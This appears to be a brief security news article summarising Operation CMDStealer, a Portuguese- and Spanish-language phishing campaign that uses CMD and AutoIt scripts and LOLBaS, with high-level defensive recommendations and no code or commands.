A financially-motivated threat actor has been observed targeting users across Mexico, Peru, and Portugal under the campaign called Operation CMDStealer. It has been active since August 2022 and primarily targets online business accounts that have significant cash flow.
Infection chain
As per researchers at Blackberry, the campaign used phishing emails in Portuguese and Spanish to lure victims speaking that language.
These emails appeared to come from government agencies or authoritative entities and contained tax- or traffic-violation-themed lures to create a sense of urgency among the victims.
The harvested information was transmitted to the attacker’s server via an HTTP POST request method and included OS language preference, keyboard layout, and OS version and architecture.
Noteworthy points
As part of the campaign, the threat actors used CMD-based scripts, Autolt scripts, and LOLBaS to avoid detection by traditional security measures. These unique methods have become increasingly common in recent phishing attacks.
For instance, a phishing kit called ‘File Archivers in the Browser’ was found masquerading as WinRAR or Windows File Explorer windows within the browser, tricking users into executing malicious files.
In another newly devised tactic in BEC attacks, attackers used victims’ residential IP addresses to obtain login credentials.
A phishing attack employed a unique meme-filled PowerShell code to deploy XWorm malware on victims’ systems.
Conclusion
Given the wide range of tactics, organizations must implement robust security measures to detect and block suspicious activity and the unauthorized execution of LOLBaS. To limit the potential impact of LOLBaS execution, organizations should enforce the principle of least privilege, such as zero trust, which only allows users to access the resources necessary to perform their tasks.